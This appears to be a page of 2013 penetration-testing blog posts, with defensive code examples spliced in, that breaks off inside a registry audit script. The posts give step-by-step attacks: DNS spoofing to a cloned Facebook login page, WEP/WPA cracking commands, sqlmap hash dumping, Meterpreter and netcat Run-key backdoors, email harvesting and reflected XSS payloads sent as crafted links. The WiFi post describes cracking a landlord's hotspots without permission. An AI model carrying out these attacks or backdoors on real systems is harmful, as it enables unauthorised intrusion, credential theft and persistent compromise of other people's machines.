Showing posts with label Hacking. Show all posts

Thursday, September 5, 2013

HuntPass.py: Python Script That Searches for Passwords [Or Any String] in a File Then Saves Results to a New File

Written by: Pranshu Bajpai | Find Pranshu on Google+ And LinkedIn

It is amazing how people on a shared LAN are still typing away their confidential information over http (non-SSL, un-encrypted) links. Someone sniffing the LAN could easily capture such information in plaintext.

During a recent test, I used Ettercap for sniffing the local LAN.

Since this was a large internal network with a lot of users, Ettercap was able to discover a lot of passwords in transit in plaintext form over the link. After dumping, the problem was to sort these passwords out of the Ettercap dump file. So I wrote this simple Python script.

Functionality: The script looks for a user-supplied search string in a given file and then stores the unique matching lines (the passwords) to a new file. It just gets things done. Please feel free to improve it if you feel the need to do so.

Usage: python HuntPass.py <InputFile> <OutputFile> <SearchString>

Download: Github - https://github.com/lifeofpentester/huntpass

Example:

Here, I have saved my Ettercap sniffer results to a file called 'etterlog'. This is my <InputFile>.


I am looking for lines with the word "PASS" ( for password) in them. I want these passwords saved in a file called 'Passwords.txt'


#python HuntPass.py etterlog Passwords.txt PASS

Only two lines in 'etterlog' had 'PASS', so total passwords found are 2 in this case.

They are stored in a separate file called 'Passwords.txt'.

If a user omits an argument while running the program, it exits after printing the 'Usage' information.

If you're new to Python, you might like to read the code. Here it is:

#!/usr/bin/env python3
# HuntPass.py (Python 3 version of the original Python 2 script)

import sys   # Taking arguments from the terminal
import os    # Clearing the screen
import time

# The first argument is always the program name, so four arguments are needed in total
if len(sys.argv) < 4:
    sys.exit('Usage: python HuntPass.py <InputFile> <OutputFile> <SearchString>')  # Exit if the user doesn't give all the arguments

os.system('clear')

time_on_your_system = time.asctime(time.localtime(time.time()))

print("\t\t_____________", time_on_your_system, "_____________")
print("\n\t\t_____A Small Script to find Passwords in Dumps_____")
print("\n\t\t####################################################")
print("\n\t\t#________________Written by Pranshu_________________#")
print("\t\t______________________________________________________")

filename = sys.argv[1]       # Input file
newfile = sys.argv[2]        # Output file
search_string = sys.argv[3]  # Text to search for

print("\n\tLooking in", filename + " | " + "Storing Result in", newfile + " | " + "Searching for", search_string)

flag = input("\n\n\t\tProceed? (y/n): ")

if flag == 'y':
    lines_seen = set()  # Lines already written, to prevent duplicate passwords while saving
    total_pass = 0
    # Input in read mode, output in append mode; 'with' closes both files even if an error occurs.
    # errors="replace" keeps the script running if the sniffer dump contains non-text bytes.
    with open(filename, "r", errors="replace") as f1, open(newfile, "a+") as f2:
        for line in f1:
            if line not in lines_seen and search_string in line:
                f2.write(line)
                lines_seen.add(line)
                total_pass = total_pass + 1
    print("\n\t\tTotal Passwords found are: ", total_pass)
    print("\n\t\tSaved in ", newfile)
print("\n\t\t________________________QUITTING!____________________\n\n")



Like I said, feel free to improve it according to your needs.
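A defender auditing their own LAN for the cleartext-credential problem this post describes wants more than a grep for "PASS": a scanner that recognises the common cleartext login exchanges (FTP and POP3 USER/PASS pairs, HTTP Basic authorization headers), ties the username to the client and server involved, deduplicates repeats, and masks the secret so the report can be handed to the service owners without itself becoming a password file. The following is an added example written for this page, not the HuntPass script or any Ettercap tooling; the dump lines, the "[proto] client:port -> server:port payload" line layout and every address in them are constructed for the demonstration.

```python
import base64
import re

# Constructed sample lines in the style of a sniffer's text dump; not a real capture.
SAMPLE_DUMP = """\
Thu Sep  5 10:01:12 2013 [ftp] 192.168.0.23:51722 -> 192.168.0.5:21 USER alice
Thu Sep  5 10:01:13 2013 [ftp] 192.168.0.23:51722 -> 192.168.0.5:21 PASS s3cret
Thu Sep  5 10:01:13 2013 [ftp] 192.168.0.23:51722 -> 192.168.0.5:21 PASS s3cret
Thu Sep  5 10:02:40 2013 [http] 192.168.0.41:40011 -> 10.0.0.8:80 GET /intranet/ HTTP/1.1
Thu Sep  5 10:02:40 2013 [http] 192.168.0.41:40011 -> 10.0.0.8:80 Authorization: Basic Ym9iOmh1bnRlcjI=
Thu Sep  5 10:03:02 2013 [pop3] 192.168.0.77:60214 -> 10.0.0.9:110 USER carol
Thu Sep  5 10:03:02 2013 [pop3] 192.168.0.77:60214 -> 10.0.0.9:110 PASS letmein
Thu Sep  5 10:03:05 2013 [pop3] 192.168.0.77:60214 -> 10.0.0.9:110 +OK Logged in.
"""

# One dump line (assumed layout): "[proto] client:port -> server:port payload"
LINE_RE = re.compile(
    r"\[(?P<proto>\w+)\]\s+(?P<src>[\d.]+):\d+\s+->\s+(?P<dst>[\d.]+):\d+\s+(?P<payload>.*)$")
USER_RE = re.compile(r"^USER\s+(\S+)", re.IGNORECASE)                      # FTP / POP3 username
PASS_RE = re.compile(r"^PASS\s+(\S+)", re.IGNORECASE)                      # FTP / POP3 password
BASIC_RE = re.compile(r"^Authorization:\s*Basic\s+(\S+)", re.IGNORECASE)  # HTTP Basic auth


def mask(secret):
    """Replace a secret with asterisks, keeping only its length for the report."""
    return "*" * len(secret)


def find_cleartext_credentials(text):
    """Scan dump text and return one masked finding per distinct credential seen."""
    findings, seen = [], set()
    pending_users = {}  # flow -> last USER seen, for protocols that send USER and PASS separately
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        proto, src, dst, payload = m.group("proto", "src", "dst", "payload")
        flow = (proto, src, dst)
        um = USER_RE.match(payload)
        if um:
            pending_users[flow] = um.group(1)
            continue
        user = password = None
        pm = PASS_RE.match(payload)
        bm = BASIC_RE.match(payload)
        if pm:
            user, password = pending_users.get(flow, "?"), pm.group(1)
        elif bm:
            try:
                decoded = base64.b64decode(bm.group(1), validate=True).decode("utf-8", "replace")
            except ValueError:  # not valid base64: nothing to report
                continue
            user, _, password = decoded.partition(":")
        if password is None:
            continue
        key = (flow, user, password)  # deduplicate in memory only; the secret is never written out
        if key in seen:
            continue
        seen.add(key)
        findings.append({"proto": proto, "client": src, "server": dst,
                         "username": user, "password": mask(password)})
    return findings


if __name__ == "__main__":
    for finding in find_cleartext_credentials(SAMPLE_DUMP):
        print(finding)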

Tuesday, June 4, 2013

How To Spoof DNS In Kali Linux / Facebook Phishing Page Using Social Engineering Toolkit In Kali Linux / BackTrack

Written by: Pranshu Bajpai | Find Pranshu on Google+ And LinkedIn

I was recently asked to demonstrate quickly how DNS can be spoofed using Kali Linux, and how the traffic can be forwarded to a fake phishing page. I decided to demonstrate by phishing the Facebook page and spoofing the DNS to point facebook.com to my machine's IP address where I am hosting a fake page using social engineering toolkit.

Here's the procedure:

Host a phishing page using se-toolkit: Website Attack Vectors -> Credential Harvester -> Clone website / Use Web Template


 

As you can see I used a template of Facebook and SET hosted this on my IP: 192.168.0.10 at port 80.

Now I need to make sure traffic meant for facebook.com is redirected to my IP; for that I can use the DNS Spoof plugin available in ettercap.

Change the contents of the file etter.dns, so the facebook.com points to your own IP.

Then load up "ettercap -G" and go to Plugins -> Manage the Plugins -> double click the DNS Spoof plugin. Make sure you see the '*' next to it.

Next, ARP poison all the hosts in the network, so that all the traffic passes through your machine. Start sniffing (read up on ARP poisoning if this is unfamiliar).

Wait for some time. When someone tries to access facebook.com, your ettercap window will tell you 'blah_blah.facebook.com' spoofed to '<your ip>'.

At the same time in your SET window you'll see 'we got a hit!!' along with some other info. If the victim is gullible enough to enter his/her credentials on your phishing page, you'll see those details in the SET window.

But you have to play the waiting game and hold on until someone tries to access the phished website.


Disclaimer: This Post was only to demonstrate a concept; no Facebook hacking is endorsed or intended. This will only work on internal networks, that is, machines susceptible to your ARP poisoning attacks.
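The "ARP poison all the hosts" step is also what a defender watches for: the poisoning only works because one machine starts answering ARP for the gateway's IP and for the victims' IPs at the same time, so the IP-to-MAC mapping seen on the wire changes, and one MAC ends up claiming several IPs. The following detector is an added example written for this page (not part of the post, ettercap or any other tool): it runs over a constructed list of ARP reply records, with invented addresses, and raises one alert when an IP's MAC changes and one when a MAC answers for more than one IP. An optional `trusted` table of known-good pairs (for example the gateway) lets it alert even on the very first bogus reply.

```python
from collections import defaultdict

# Constructed ARP reply records as (time, sender IP, sender MAC); not a real capture.
# Host .10 starts answering for both the gateway (.1) and a client (.23), the
# classic signature of one machine ARP-poisoning its way between the two.
SAMPLE_ARP_REPLIES = [
    ("10:00:01", "192.168.0.1",  "aa:bb:cc:00:00:01"),
    ("10:00:02", "192.168.0.23", "aa:bb:cc:00:00:23"),
    ("10:00:03", "192.168.0.10", "aa:bb:cc:00:00:10"),
    ("10:00:30", "192.168.0.1",  "AA:BB:CC:00:00:10"),  # .10's MAC now claims the gateway IP
    ("10:00:30", "192.168.0.23", "aa:bb:cc:00:00:10"),  # and the client IP
    ("10:00:31", "192.168.0.1",  "aa:bb:cc:00:00:10"),  # repeat of an already-reported claim
]


def detect_arp_spoofing(replies, trusted=None):
    """Return alerts for (a) an IP whose MAC changes and (b) a MAC that answers
    for more than one IP. `trusted` is an optional dict of known-good IP -> MAC
    pairs (e.g. the gateway) seeded before any reply is processed."""
    ip_to_mac = {ip: mac.lower() for ip, mac in (trusted or {}).items()}
    mac_to_ips = defaultdict(set)
    for ip, mac in ip_to_mac.items():
        mac_to_ips[mac].add(ip)
    flagged_macs = set()
    alerts = []

    for ts, ip, mac in replies:
        mac = mac.lower()  # MAC addresses compare case-insensitively
        known = ip_to_mac.get(ip)
        if known is None:
            ip_to_mac[ip] = mac  # first sighting of this IP: record it
        elif known != mac:
            alerts.append({"time": ts, "type": "ip_mac_change",
                           "ip": ip, "old_mac": known, "new_mac": mac})
            ip_to_mac[ip] = mac  # track the new claim so a repeat is not re-reported
        mac_to_ips[mac].add(ip)
        if len(mac_to_ips[mac]) > 1 and mac not in flagged_macs:
            flagged_macs.add(mac)
            alerts.append({"time": ts, "type": "mac_claims_multiple_ips",
                           "mac": mac, "ips": sorted(mac_to_ips[mac])})
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_spoofing(SAMPLE_ARP_REPLIES):
        print(alert)
```

Fed from a real ARP feed (tcpdump or a switch's port-security log) this is the same logic arpwatch-style tools apply; the `trusted` seed matters because an attacker who poisons before the monitor starts would otherwise be recorded as the legitimate first sighting.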

Thursday, May 16, 2013

How To Hack Wifi and Crack its Password | Hacking Wifi | WEP + WPA

Written by: Pranshu Bajpai | Find Pranshu on Google+ And LinkedIn

I recently traveled to Delhi in order to collaborate with an information security firm there.

The place that I rented for my short stay demanded an extra amount if I wanted to access the Internet. That didn't go down with me too well. They were using WEP, WPA and WPA2 security in the different WiFi HotSpots that they were running.

WEP Cracking

No doubt, WEP is the easiest to crack.

Here's how to crack WEP:
#airmon-ng start wlan0

Notice that the monitor mode is enabled on mon1; take note of this. We will need this interface later on.

Start dumping data packets with airodump:

#airodump-ng mon1



You'll see all the Wifi hotspots available in your area. Here we see different security types: WEP, WPA and WPA2. As WEP is the easiest to crack, choose one with WEP security.

Also, it is important to note other information here as that will determine how easily you get into the WiFi:
  • The BSSID is the MAC address of the Wifi hotspot.
  • Pwr tells you about the signal strength.
  • Beacon signals are sent by the hotspot to indicate its presence.
  • Data is the actual packets that we are interested in. The more data packets we have, the more certain we are to crack the hotspot.
  • CH tells you the channel being used by the hotspot.
Here I am testing something called 'BIPL'.

So I use airodump to focus on dumping packets from this particular BSSID and store them in a file:
#airodump-ng -w wap -c 8 --bssid 14:D6:4D:A6:F6:69 mon1
-w specifies the file to write to, -c specifies the channel, and you know what --bssid is for.

Now packet capture starts, and we play the waiting game. Wait to collect enough packets before trying to crack the password. Usually, we wait till we grab around 20000 packets.

How long this takes depends on the traffic flow on that BSSID and your distance from the BSSID.

If it is taking too long to grab the required number of packets, then you can use something called aireplay:
#aireplay-ng -b 14:D6:4D:A6:F6:69 -h 00:11:22:33:44:55 mon1
-b option is to specify the bssid
-h is to specify your hardware address

aireplay-ng will start generating bogus traffic, so that you can grab enough data packets fast.



Now that we have enough data packets (42445), we can start cracking the password.

#aircrack-ng wap-02.cap
This cap file is where we saved the captured packets:


After a while Aircrack-ng will give you the cracked password:




It turns out the password is someone's cell phone number. I traced its location, and it's based in Delhi. Using personal information as a password is bad practice.

  
WPA Cracking

A detailed article on WPA / WPA2 cracking is here

WPA cracking can be a bit more uncertain and complicated.

One thing to remember while WPA cracking is that you need to grab the WPA handshake. Use airodump to dump packets from the target WPA network (just like in WEP), but wait until you see 'WPA handshake' (or something close to that) in the top right corner.

Then stop the packet capture.

Load up aircrack-ng and provide it the .cap file where the handshake is located (saved by airodump previously).

Also provide a wordlist to aircrack-ng. Remember this is a 'dictionary based' attack:

#aircrack-ng blah_blah.cap -w /root/dic/darkc0de.lst
Aircrack will try passwords from the dictionary file against the .cap file. This might take a long time to crack and success depends on the kind of dictionary file you are using and how strong the password is.




Another tool called 'Reaver' can be used for WPA cracking, if WPS is enabled.

Here's the sample use of reaver:
#reaver -i mon1 -a 94:D7:23:48:BE:78 -vv -c8

  • -i is for interface
  • -a "94.... " is the bssid of hotspot
  • -vv for verbose mode
  • -c to specify the channel

For details on WPA / WPA2 Cracking, Check out this article

Disclaimer: This post is merely to demonstrate the inherent risks involved in using outdated WiFi security. This test was done under simulated conditions and does not endorse public or private WiFi hacking.

Sunday, May 12, 2013

Setting Up VirtualBox / Virtual Lab for Penetration Testing in Kali Linux / Backtrack

Written by: Pranshu Bajpai | Find Pranshu on Google+ And LinkedIn

Configuring a virtual lab on your PC becomes indispensable if you wish to test different attacks under controlled conditions. You don't always have access to shared LANs where there are a lot of vulnerable machines that you're allowed to experiment on. For example, ARP poisoning on a large LAN would bring down the network quickly, and you won't have a good time explaining to the network administrator why you weren't testing in an isolated environment. Hence, for numerous reasons, it is best if you work in virtual environments while testing.

Install VirtualBox on your Kali or Backtrack (or any other linux):

#apt-get install virtualbox
OR
System Tools -> Add / Remove Software

Start VirtualBox after installation:
Applications -> Accessories -> VirtualBox
You need to have the ISO Image of the OS you want to host on the virtualbox. (I had a Windows XP Image)

In VirtualBox Menu:

New -> Allot Name and Type of OS ->  Select RAM Memory Size ->  Create New Hard Disk -> VDI -> Dynamically Allocated -> Summary -> Create

Now in Main Menu of VirtualBox you'll notice the name of the machine you just created.

Start -> Point to the ISO Image of the OS -> Follow OS installation Procedures

After the normal OS install procedures, you will have the virtual OS ready, running on Linux host machine.




For networking between the host and virtual machine, I chose the 'internal' network option in VirtualBox, and I was able to ping the host and virtual machine from each other.




You can go ahead and try simulated attacks on this Virtual OS, and it gives you more control over the experiment (as you can increase or decrease security on the vulnerable host at will).

Thursday, May 9, 2013

Hacking With Armitage on Kali Linux / Backtrack

Written by: Pranshu Bajpai | Find Pranshu on Google+ And LinkedIn

If you are beginning to learn, Armitage is not something you would want to start with. It is alright to quickly automate some routine Metasploit tasks using Armitage, but if you're trying to learn something, Armitage adds a level of abstraction and makes you a perfect script kiddie.

Learning stuff on 'msfconsole' or 'msfcli' before moving on to Armitage, is a better approach in my opinion.

The tool is mostly self-explanatory due to its GUI.

Here, I am simulating an attack on a Windows XP system using Armitage on Kali Linux.

Bring up Armitage by typing:
#service postgresql start
#armitage
First, I need to 'discover' this host.
Hosts -> nmap scan
OR, I could manually 'add host' by providing its IP.
 
Now I can see this windows XP host in Armitage workspace. From here, I could manually search for vulnerabilities on the Windows XP and then try to exploit them, but I chose the easy way on Armitage, which is 'Hail Mary'.
Attacks -> Hail Mary
It tried some common exploits against the services available on the victim machine and gave me the 'red' outline around that host, which means the host is compromised.



I grab the password hashes that I can try to crack later on.



I gain access to cmd.exe 'command prompt' in windows.




I set up a persistent Meterpreter backdoor on the hacked Windows XP for later access.




I view the processes running on hacked machine.




I take screenshots of activities on the hacked machine.




 I tried connecting with VNC viewer to the remote machine.

If you're a part of a Pen Test team, then one of you can host an Armitage server and other can 'connect' to it, so that you can collaborate on the project.

At the connect window, you need to enter the host name of the fellow Pen Tester hosting the Armitage server, the port number, and the username and password that he/she has provided you.



At the next window, confirm the fingerprint.




Pick a 'Handle' for the session.



And then you can join in with your Pen Test Team and work in collaboration on the project


There's a bunch of other stuff you could do with Armitage, please feel free to explore further.

Friday, May 3, 2013

How To Hack A Website - Simple Demo | Kali Linux / BackTrack | Pranshu

Written by: Pranshu Bajpai | Find Pranshu on Google+ And LinkedIn


I was testing for SQL vulnerabilities at random over the Internet and found a whole lot of websites that are still vulnerable to SQL injection. I refrained from any further testing due to lack of explicit permission from the owners. However, here's a demonstration, from one of my penetration testing projects, of how these websites may be hacked if the SQL vulnerabilities are left unpatched.

Tip: Read up a little on SQL injection. For example, start with figuring out what this is trying to do:
SELECT * FROM users WHERE name = '' OR '1'='1';
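To see what that query is doing, and why the fix is parameter binding rather than input filtering, here is an added example (written for this page, not taken from the post or from sqlmap). It builds a throwaway in-memory SQLite table with constructed rows and runs the page's `' OR '1'='1` input through two versions of the same lookup: one that splices the input into the SQL text, which is the bug sqlmap exploits, and one that passes it as a bound parameter, so the quote characters are just data.

```python
import sqlite3


def make_demo_db():
    """In-memory table with constructed rows, standing in for the site's users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password_hash TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", "hash-of-admin-pw"), ("alice", "hash-of-alice-pw")])
    return conn


def find_user_vulnerable(conn, name):
    """Builds the SQL by string formatting, so the input is parsed as part of the query."""
    query = "SELECT * FROM users WHERE name = '%s'" % name
    return conn.execute(query).fetchall()


def find_user_safe(conn, name):
    """Parameter binding: the value travels separately and can never change the query structure."""
    return conn.execute("SELECT * FROM users WHERE name = ?", (name,)).fetchall()


# The input that turns the page's query into: ... WHERE name = '' OR '1'='1'
INJECTION = "' OR '1'='1"

if __name__ == "__main__":
    db = make_demo_db()
    print("vulnerable:", find_user_vulnerable(db, INJECTION))  # every row comes back
    print("safe:      ", find_user_safe(db, INJECTION))        # no user is literally named that
    print("safe/admin:", find_user_safe(db, "admin"))
```

The vulnerable version returns every row because the WHERE clause became a tautology; the bound version returns nothing because it looked for a user whose name is literally the injection string. The same distinction applies to PHP's prepared statements, which is what the unpatched sites in the post are missing.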


The tool sqlmap comes preloaded with both Kali and Backtrack.

If the dynamic parameter in the PHP script is vulnerable, then sqlmap will try to inject code into it.

I've blacked out the website's information for obvious reasons.

First, get the tool to list the available databases:



The 'information_schema' DB is where MySQL stores the schema, so I'm not interested in that one. The other one is my target.

I try to grab the 'tables' available in this other database:


A bunch of tables get listed; among those, the table 'members' looks interesting, so I grab the columns for that table:

And I see a column with passwords, so I'll get the hashes from here (I've seen some web admins who are so careless that they store the passwords in plaintext, which would require no password cracking):



Finally, I get my hands on the password hashes and the reverse engineering begins from there (use jtr, John the Ripper):


Unless you actually know what sqlmap did for you in the background, it is not that interesting and makes you a perfect script kiddie.

Once you crack the password hashes, you can login to the website's control panel as 'admin' and then change html files (index.html for homepage). That would be website defacing.

Disclaimer: As stated in the beginning, this excerpt is from an authorized penetration test. If you notice an SQL weakness in a website, please refrain from engaging in illicit activities and inform the web administrator.

Sunday, April 14, 2013

Persistent Meterpreter Service Backdoor | Making a Backdoor on Hacked Machine for later entry | Pranshu

Written by: Pranshu Bajpai | Find Pranshu on Google+ And LinkedIn

After penetrating a system during testing, it's wise to make a backdoor on the system for easy entry later on. I followed the Metasploit Unleashed examples to make a persistent Meterpreter Service.


So payload was the Meterpreter module, and the 'lhost' and 'lport' belong to my attacking machine.

It created the vbs script in the victim computer's "C:\WINDOWS\TEMP\" directory, executed this agent with process ID 3676, and manipulated start-up Registry entries to make sure it runs after each reboot.

Using ophcrack in Kali Linux / Backtrack to Crack Hashes | Pranshu

Written by: Pranshu Bajpai | Find Pranshu on Google+ And LinkedIn


Ophcrack is a GUI tool that can be used for cracking password hashes. Perhaps the main attraction of using this tool is its ability to deploy rainbow tables while cracking the password. This makes the process of brute force cracking faster.

At this point, it is essential that you understand the importance of rainbow tables in a brute force attack. A hash is a one-way function and cannot be reversed, so we can't convert the password hashes back to their corresponding plaintext forms. For this reason, during a brute force attack, we take a candidate passphrase (in plaintext) and compute its hash. Then we compare this hash with the password hash, and if there is a match, we know that this plaintext is the passphrase. Most of the time and CPU power in a brute force attack is spent computing these hashes. Rainbow tables are 'pre-computed hashes': once you have a rainbow table, all you need to do is compare the hashes in the table against the password hash you obtained during penetration testing. Hence, you save considerable time and CPU cycles while hunting for the plaintext form of the passphrase.

Here's an example where I cracked some LM Hashes I grabbed from a machine during penetration testing (the hashes were obtained by using pwdump in Meterpreter).



You can load up any of these rainbow tables germane to the victim's OS. Click on 'install' to obtain them. They are large files and will take a while to download depending on your network bandwidth.


Ophcrack can speed up the Windows password cracking process during penetration testing, and if you test Windows systems frequently, it would be prudent to have these rainbow tables saved on your local disk.
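The reason precomputation works against the LM hashes in this post is that LM hashing has no salt: every user with the same password gets the same hash, so one table serves every machine. The following added example (written for this page; it is not Ophcrack's code and uses SHA-256 as a stand-in for LM, with a plain hash-to-plaintext dictionary standing in for a real rainbow table's chained structure) shows the trade-off from both sides: cracking an unsalted hash is a single lookup with no hashing at crack time, while a per-user salt forces every candidate to be re-hashed for that one hash and makes the precomputed table useless. The wordlist and salts are constructed.

```python
import hashlib
import os

WORDLIST = ["password", "letmein", "hunter2", "summer2013"]  # constructed candidate list


def unsalted_hash(password):
    """Hash of the bare password: identical for every user who picks the same password."""
    return hashlib.sha256(password.encode()).hexdigest()


def build_lookup_table(words):
    """Precompute hash -> plaintext once. This is the work a rainbow table saves you
    (a real rainbow table compresses it with hash chains, but the idea is the same)."""
    return {unsalted_hash(w): w for w in words}


def lookup(table, digest):
    """Cracking an unsalted hash is one dictionary lookup; nothing is hashed at crack time."""
    return table.get(digest)


def salted_hash(password, salt):
    """Hash of salt || password: a different salt gives a different digest for the same password."""
    return hashlib.sha256(salt + password.encode()).hexdigest()


def crack_salted(digest, salt, words):
    """With a salt the table is useless: each candidate must be hashed again for this salt.
    Returns (plaintext or None, number of hashes computed)."""
    attempts = 0
    for w in words:
        attempts += 1
        if salted_hash(w, salt) == digest:
            return w, attempts
    return None, attempts


if __name__ == "__main__":
    table = build_lookup_table(WORDLIST)
    print("unsalted lookup:", lookup(table, unsalted_hash("hunter2")))
    salt = os.urandom(16)  # per-user random salt, stored next to the hash
    digest = salted_hash("hunter2", salt)
    print("table hit on salted hash:", lookup(table, digest))
    print("salted crack (word, hashes computed):", crack_salted(digest, salt, WORDLIST))
```

For a real system the salt alone is not enough, since a fast hash is still brute-forced quickly per user; a deliberately slow password hash (bcrypt, scrypt or Argon2) is what turns the per-salt recomputation into a real cost.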

Email Harvesting in Kali Linux (Find out Login IDs to Bruteforce) | Kali Linux

Written by: Pranshu Bajpai | Find Pranshu on Google+ And LinkedIn

For the purpose of mass spamming or spear phishing, hackers use a module available in Metasploit that pulls email accounts of a particular organization from Google, Bing and Yahoo.

Hackers also find this useful for the online password attacks they perform later during targeted attacks, since it is important to know the IDs or usernames before commencing the cracking process. As I mentioned, the list of email addresses can also be used for mass mailing, phishing, or spear phishing.

So I conducted such a test to pull email addresses from an organization of interest to me. First, I list all the options available for this module, using the standard Metasploit command 'show options'.

Then, I set the 'domain' of the organization and the 'output' file where I want the results (email addresses) saved, and 'execute' the module.


After a while, these are the results given back to me:


 
Bots crawl over the Internet looking for email addresses. In order to avoid being spammed, a mitigation strategy is to insert the email address in a graphic file, or to mention it in a custom format that the bot will not be able to comprehend as an email address. For instance, name [at] gmail [dot] com.


Basic XSS Attacks Demo, Examples | Pranshu

Written by: Pranshu Bajpai | Find Pranshu on Google+ And LinkedIn

Cross site scripting attacks are common. But for people new to penetration testing, they may seem a little convoluted at first (especially for beginners who don't have much experience with web languages). There's a whole lot of theory available all over the web on XSS, so I'm not getting into that.

Given below are some of the simplest demonstrations of cross site scripting attacks.

This is a simple webpage:
http://www.insecurelabs.org/task/Rule1
As a penetration tester, you would study the page and try to inject code into its 'Search' box. I insert:
<h1>XSS Attack Demo - Pranshu</h1>
Press enter and notice the display of XSS Attack Demo - Pranshu
(Notice the use of HTML header tags.)



Now try this in the Search box:
<script>alert("You are Attacked by Pranshu")</script>
See the window alert?


You can even try a new window pop-up that can be used to open a new website (although most browsers now have pop-ups blocked by default):
<script>window.open( "http://www.lifeofpentester.blogspot.com" )</script>
Link sent to Victim would look like
http://www.insecurelabs.org/task/Rule1?query=%3Cscript%3Ewindow.open%28+%22http%3A%2F%2Fwww.lifeofpentester.blogspot.com%22+%29%3C%2Fscript%3E


You can also try other stuff like displaying an evil image on the website (kind of like defacing it)

<html><body><img src="http://fc05.deviantart.net/fs71/i/2012/257/8/b/hacker_skull_wallpaper_by_simon93_ita-d5enmvk.jpg"> </body> </html>
Link sent to victim:
http://www.insecurelabs.org/task/Rule1?query=%3Chtml%3E%3Cbody%3E%3Cimg+src%3D%22http%3A%2F%2Ffc05.deviantart.net%2Ffs71%2Fi%2F2012%2F257%2F8%2Fb%2Fhacker_skull_wallpaper_by_simon93_ita-d5enmvk.jpg%22%3E+%3C%2Fbody%3E+%3C%2Fhtml%3E

In this case your victim would follow your link and see something like this



Remember: The website is not actually defaced. It is just an "illusion" for that particular user who followed your specially crafted link.

In reality, why would the victim put this stuff in Search box?  They won't.

So we send them this malicious link which is specially crafted by the attacker:

http://www.insecurelabs.org/task/Rule1?query=%3Cscript%3Ealert%28%22You+are+Attacked+by+Pranshu%22%29%3C/script%3E
A hacker will post something like this on a forum (somewhere where a lot of people can see it):
Hey guys!! New stuff on insecurelabs, check it out. Here's the link:

http://www.insecurelabs.org/task/Rule1?query=%3Cscript%3Ealert%28%22You+are+Attacked+by+Pranshu%22%29%3C/script%3E

Now, to a savvy user the included script tags would act as a dead giveaway, but to a normal user it's just a link on insecurelabs.org, and they might click.

Now imagine if, in place of the harmless alert box, I point them to malicious JavaScript code that gets executed in their browser. Such code can be used to steal cookies stored on the victim's machine.

Note: It is important to realize that though the victim ends up being exploited, the vulnerability actually lies on the web server. This is why many bounty hunters these days go after bounties that are awarded for discovering such flaws on a website that might affect its users.
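Since the flaw is on the server, the fix is on the server too: the 'Search' page reflects the `query` parameter into its HTML without encoding it. The following added example (written for this page; it is not insecurelabs' code, and the results-page template is a constructed stand-in) decodes the crafted link from the post exactly as the server would, shows the reflected markup that results, and shows the same page rendered with HTML escaping, where `<`, `>` and `"` become entities and the script is displayed as text instead of executed. A small helper at the end applies the same decoding to request URLs, which is how the crafted link would be spotted in a web server's access log.

```python
import html
from urllib.parse import parse_qs, unquote_plus, urlsplit

# The crafted link from the post; the script travels in its 'query' parameter.
CRAFTED_LINK = ("http://www.insecurelabs.org/task/Rule1?query="
                "%3Cscript%3Ealert%28%22You+are+Attacked+by+Pranshu%22%29%3C/script%3E")

# Constructed stand-in for the server's results page, not insecurelabs' real template.
TEMPLATE = "<html><body><p>Results for: {term}</p></body></html>"


def extract_query(url):
    """Decode the 'query' parameter the way the server sees it (%xx and '+' undone)."""
    return parse_qs(urlsplit(url).query).get("query", [""])[0]


def render_vulnerable(term):
    """Reflects the search term unchanged: any markup in it becomes part of the page."""
    return TEMPLATE.format(term=term)


def render_safe(term):
    """HTML-escapes the term before reflecting it, so the browser shows it as text."""
    return TEMPLATE.format(term=html.escape(term, quote=True))


def flag_suspicious_requests(urls):
    """Detection over request URLs: return those whose decoded query string would
    inject a tag or a javascript: URL. Assumes access-log style full URLs."""
    flagged = []
    for url in urls:
        decoded = unquote_plus(urlsplit(url).query).lower()
        if "<" in decoded or "javascript:" in decoded:
            flagged.append(url)
    return flagged


if __name__ == "__main__":
    term = extract_query(CRAFTED_LINK)
    print("decoded parameter:", term)
    print("vulnerable page:  ", render_vulnerable(term))
    print("escaped page:     ", render_safe(term))
    print("flagged:", flag_suspicious_requests([CRAFTED_LINK, "http://www.insecurelabs.org/task/Rule1?query=kali"]))
```

Escaping at the point of output is the general rule: the same `html.escape` call protects the page no matter what the attacker URL-encoded, which is why output encoding, not blacklisting `<script>`, is the standard fix.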

Friday, April 12, 2013

Hacking with Meterpreter Session on Kali linux / Backtrack | Post Exploitation

Written by: Pranshu Bajpai | Find Pranshu on Google+ And LinkedIn

In my last post, I demonstrated how a vulnerable system can be discovered quickly using the nmap tool. We used the script 'smb-check-vulns.nse' belonging to the 'vuln' category. We used it in 'unsafe' mode which is very likely to crash the victim machine.

In this one, I exploit that system using Metasploit and obtain a meterpreter session:


We need to set the 'rhost' or remote host, the payload, and the 'lhost' or localhost. The standard Metasploit command 'exploit' will then run the module with these parameters configured.

Now:

- We can try to dump the password hashes of this system.

- We can upload and execute a nc.exe (netcat) file on hacked system to gain access later (backdoor).

Uploading Netcat on Hacked Machine as a Backdoor | Kali Linux / Backtrack | Post Exploitation

Written by: Pranshu Bajpai | Find Pranshu on Google+ And LinkedIn

Netcat, the Swiss army knife, can be used as a backdoor, but I would advise against it because it has no authentication. Anyone who finds the netcat server on the victim's computer can control that machine.

First, upload Netcat on the remote machine (it is present in "/usr/share/windows-binaries" path in Kali Linux or Backtrack).

Next, enumerate the registry keys in the 'run' category (that run after each reboot).


Now use 'reg setval' to set the value under 'run' in the registry of victim's machine.

Then use 'reg queryval' to see that it's successfully added.

Use the 'netsh firewall add portopening' command in Windows shell to allow port opening at 455 (where netcat will listen).


Execute nc.exe using:
#meterpreter> execute -f nc.exe
Now you will see nc.exe as a process on victim's machine.
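Both this post and the Meterpreter persistence post above rely on the same foothold: a Run key entry that launches something from C:\WINDOWS\TEMP\ after every reboot (nc.exe here, a .vbs agent there). That is also what an incident responder audits first. The following is an added example written for this page, not part of the post or of Metasploit: it parses text in the layout of `reg query ... /s` output (the sample below is constructed, with invented value names) into Run-key entries and flags the ones that execute from a temporary directory, launch a script host or script file, or reference a known network-shell binary.

```python
import re

# Constructed 'reg query ... /s'-style output; not from a real machine.
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    VBoxTray        REG_SZ    C:\WINDOWS\system32\VBoxTray.exe
    nc              REG_SZ    C:\WINDOWS\TEMP\nc.exe
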